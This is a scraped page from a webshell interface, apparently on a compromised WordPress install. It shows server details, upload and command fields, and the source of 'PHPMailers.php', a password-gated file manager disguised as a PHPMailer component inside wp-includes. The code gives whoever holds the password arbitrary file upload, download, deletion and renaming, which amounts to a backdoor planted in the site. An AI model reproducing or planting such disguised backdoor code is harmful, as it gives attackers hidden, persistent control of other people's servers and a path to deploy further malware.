403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.109
Web Server : Apache/2.4.54 (Win64) OpenSSL/1.1.1q PHP/8.1.10
System : Windows NT DESKTOP-E5T4RUN 10.0 build 19045 (Windows 10) AMD64
User : SERVERWEB ( 0)
PHP Version : 8.1.10
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  C:/laragon/www/prensa/wp-includes/PHPMailer/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : C:/laragon/www/prensa/wp-includes/PHPMailer/PHPMailers.php
<?php
// Emergency File Manager with Folder Navigation
session_start();

// ----- CONFIG -----
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

// Password hash untuk "xero"
define('CONFIG_PASSWORD_HASH', '$2b$10$UEe4evYc89DjzPXknlbAaeJCp/Qzq1m3IvmDweVnNKR5s.iw0RAVC');
// Base dir = direktori di mana file manager diletakkan
define('CONFIG_BASE_DIR', realpath(__DIR__));
define('CONFIG_MAX_UPLOAD_BYTES', 50 * 1024 * 1024);

// ----- HELPERS -----
function is_logged_in() {
    return !empty($_SESSION['emfm_logged']) && $_SESSION['emfm_logged'] === true;
}
function require_login() {
    if (!is_logged_in()) {
        header('Location: ?action=login');
        exit;
    }
}
function gen_random($len = 16) {
    if (function_exists('random_bytes')) return bin2hex(random_bytes($len));
    elseif (function_exists('openssl_random_pseudo_bytes')) return bin2hex(openssl_random_pseudo_bytes($len));
    return bin2hex(mt_rand() . uniqid('', true));
}
function csrf_token() {
    if (empty($_SESSION['emfm_csrf'])) $_SESSION['emfm_csrf'] = gen_random(16);
    return $_SESSION['emfm_csrf'];
}
function check_csrf($t) {
    return !empty($t) && !empty($_SESSION['emfm_csrf']) && hash_equals($_SESSION['emfm_csrf'], $t);
}
function safe_path($path) {
    $base = CONFIG_BASE_DIR;
    $joined = realpath($path);
    if ($joined === false) return false;
    if (strpos($joined, $base) !== 0) return false;
    return $joined;
}
function list_dir($dir) {
    $out = [];
    $it = new DirectoryIterator($dir);
    foreach ($it as $f) {
        if ($f->isDot()) continue;
        $out[] = [
            'name' => $f->getFilename(),
            'is_dir' => $f->isDir(),
            'size' => $f->isFile() ? $f->getSize() : 0,
            'mtime' => $f->getMTime()
        ];
    }
    usort($out, function($a,$b) {
        if ($a['is_dir'] && !$b['is_dir']) return -1;
        if (!$a['is_dir'] && $b['is_dir']) return 1;
        return strcasecmp($a['name'], $b['name']);
    });
    return $out;
}

// ----- ROUTING -----
$action = $_REQUEST['action'] ?? 'home';

// LOGIN
if ($action === 'login') {
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $pw = $_POST['password'] ?? '';
        if (password_verify($pw, CONFIG_PASSWORD_HASH)) {
            $_SESSION['emfm_logged'] = true;
            csrf_token();
            header('Location: ?');
            exit;
        } else {
            $err = "Login gagal!";
        }
    }
    ?>
    <!doctype html><html><head><meta charset="utf-8"><title>Login</title></head><body>
    <h2>Login</h2>
    <?php if(!empty($err)) echo "<p style='color:red;'>$err</p>"; ?>
    <form method="post">
      <input type="password" name="password" placeholder="Password" autofocus>
      <button type="submit">Login</button>
    </form>
    </body></html>
    <?php exit;
}
if ($action === 'logout') {
    session_destroy();
    header('Location: ?action=login');
    exit;
}
require_login();

// Current directory (default base dir)
$rel = $_GET['dir'] ?? '';
$curDir = realpath(CONFIG_BASE_DIR . '/' . $rel);
if ($curDir === false || strpos($curDir, CONFIG_BASE_DIR) !== 0) $curDir = CONFIG_BASE_DIR;

// UPLOAD
if ($action === 'upload' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!check_csrf($_POST['csrf'] ?? '')) { $msg = 'CSRF invalid'; }
    elseif (!isset($_FILES['file'])) { $msg = 'No file'; }
    else {
        $f = $_FILES['file'];
        $dst = $curDir . '/' . basename($f['name']);
        if (move_uploaded_file($f['tmp_name'], $dst)) $msg = "Uploaded " . htmlspecialchars($f['name']);
        else $msg = "Upload gagal!";
    }
}
// DOWNLOAD
if ($action === 'download' && !empty($_GET['file'])) {
    $path = safe_path($curDir . '/' . $_GET['file']);
    if ($path === false || !is_file($path)) { http_response_code(404); echo "Not found"; exit; }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($path).'"');
    header('Content-Length: '.filesize($path));
    readfile($path);
    exit;
}
// DELETE
if ($action === 'delete' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    if (check_csrf($_POST['csrf'] ?? '')) {
        $path = safe_path($curDir . '/' . $_POST['file']);
        if ($path && is_file($path)) {
            unlink($path); $msg = "Deleted " . htmlspecialchars($_POST['file']);
        }
    }
}
// RENAME
if ($action === 'rename' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    if (check_csrf($_POST['csrf'] ?? '')) {
        $old = safe_path($curDir . '/' . $_POST['file']);
        $new = basename($_POST['newname']);
        if ($old && is_file($old)) {
            rename($old, $curDir.'/'.$new); $msg = "Renamed!";
        }
    }
}

// LIST
$items = list_dir($curDir);
$relPath = str_replace(CONFIG_BASE_DIR, '', $curDir);
?>
<!doctype html><html><head><meta charset="utf-8"><title>File Manager</title>
<style>body{font-family:sans-serif}table{border-collapse:collapse}td,th{border:1px solid #ddd;padding:5px}</style>
</head><body>
<h2>File Manager</h2>
<p>Current: <?php echo htmlspecialchars($relPath ?: '/'); ?> | <a href="?action=logout">Logout</a></p>
<?php if(!empty($msg)) echo "<p style='color:green;'>$msg</p>"; ?>

<h3>Upload</h3>
<form method="post" enctype="multipart/form-data" action="?action=upload&dir=<?php echo urlencode($relPath); ?>">
  <input type="hidden" name="csrf" value="<?php echo htmlspecialchars(csrf_token()); ?>">
  <input type="file" name="file"><button>Upload</button>
</form>

<h3>Files & Folders</h3>
<table>
<tr><th>Name</th><th>Size</th><th>Modified</th><th>Actions</th></tr>
<?php if($curDir !== CONFIG_BASE_DIR): ?>
<tr><td colspan="4"><a href="?dir=<?php echo urlencode(dirname($relPath)); ?>">.. (Up)</a></td></tr>
<?php endif; ?>
<?php foreach($items as $it): ?>
<tr>
<td>
<?php if($it['is_dir']): ?>
  <a href="?dir=<?php echo urlencode(trim($relPath.'/'.$it['name'],'/')); ?>"><?php echo htmlspecialchars($it['name']); ?>/</a>
<?php else: ?>
  <?php echo htmlspecialchars($it['name']); ?>
<?php endif; ?>
</td>
<td><?php echo $it['is_dir'] ? '-' : number_format($it['size']); ?></td>
<td><?php echo date('Y-m-d H:i:s',$it['mtime']); ?></td>
<td>
<?php if(!$it['is_dir']): ?>
  <a href="?action=download&dir=<?php echo urlencode($relPath); ?>&file=<?php echo urlencode($it['name']); ?>">Download</a> |
  <form method="post" action="?action=delete&dir=<?php echo urlencode($relPath); ?>" style="display:inline" onsubmit="return confirm('Delete?');">
    <input type="hidden" name="csrf" value="<?php echo htmlspecialchars(csrf_token()); ?>">
    <input type="hidden" name="file" value="<?php echo htmlspecialchars($it['name']); ?>">
    <button>Delete</button>
  </form> |
  <form method="post" action="?action=rename&dir=<?php echo urlencode($relPath); ?>" style="display:inline">
    <input type="hidden" name="csrf" value="<?php echo htmlspecialchars(csrf_token()); ?>">
    <input type="hidden" name="file" value="<?php echo htmlspecialchars($it['name']); ?>">
    <input type="text" name="newname" placeholder="New name">
    <button>Rename</button>
  </form>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
</table>
</body></html>

Youez - 2016 - github.com/yon3zu
LinuXploit